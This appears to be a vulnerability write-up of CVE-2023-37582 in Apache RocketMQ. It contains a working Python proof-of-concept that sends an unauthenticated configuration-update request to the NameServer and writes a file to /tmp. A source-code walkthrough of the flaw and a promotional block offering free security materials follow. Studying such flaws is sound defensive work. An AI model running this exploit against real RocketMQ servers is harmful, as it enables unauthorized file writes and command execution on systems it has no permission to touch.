Vulnerability Profile
Apache RocketMQ is a distributed message middleware with low latency, high concurrency, high availability and high reliability. In CVE-2023-37582, due to the imperfect repair of CVE-2023-33246, when there is unauthorized access to Apache RocketMQ NameServer, the attacker can construct a malicious request to execute commands as the system user running RocketMQ.
Affected version
Apache RocketMQ <= 5.1.1
Apache RocketMQ <= 4.9.6
Environment build
Refer to Apache RocketMQ Remote Code Execution Vulnerability CVE-2023-33246 Environment Setup
Still for the convenience of debugging, we build RocketMQ related services under linux and use the source code to start
A total of two services need to be running
org.apache.rocketmq.namesrv.NamesrvStartup
org.apache.rocketmq.broker.BrokerStartup
First start NamesrvStartup, then start BrokerStartup and you need to configure the environment variable ROCKETMQ_HOME
ROCKETMQ_HOME=/home/ubuntu/Desktop/rocketmq-rocketmq-all-5.1.0
Vulnerability recurrence
run python script
import socket
import binascii
client = socket.socket()
# you ip
client.connect(('192.168.222.130',9876))
# data
json = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body='configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2) # 一个字节是2个十六进制数
head1 = '00000000'+str(hex(json_lens))[2:] # hex(xxxx) 0x1243434 去掉 0x
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)
Successfully write the specified string test in the test.txt file under the tmp directory
Help cybersecurity study, get a full set of information S letter for free:
① Mind map of cybersecurity learning growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense combat techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)
Vulnerability Analysis
org/apache/rocketmq/remoting/protocol/RequestCode.java
code represents calling different functions, and at this time, the operation of 318 update configuration is called
src/main/java/org/apache/rocketmq/remoting/protocol/RequestCode.java
According to the corresponding code, the corresponding function will be called for processing
src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java
src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java#updateConfig
src/main/java/org/apache/rocketmq/remoting/Configuration.java#update
First judge whether it is a controllable attribute
src/main/java/org/apache/rocketmq/remoting/Configuration.java#persist
src/main/java/org/apache/rocketmq/remoting/Configuration.java#getStorePath
Call getStorePath
to get the file path, the value obtained at this time is the value of configStorePath
src/main/java/org/apache/rocketmq/common/MixAll.java#string2File
src/main/java/org/apache/rocketmq/common/MixAll.java#string2FileNotSafe
src/main/java/org/apache/rocketmq/common/utils/IOTinyUtils.java#writeStringToFile
Bug fixes
Modify the parameter that disables modifying the configuration path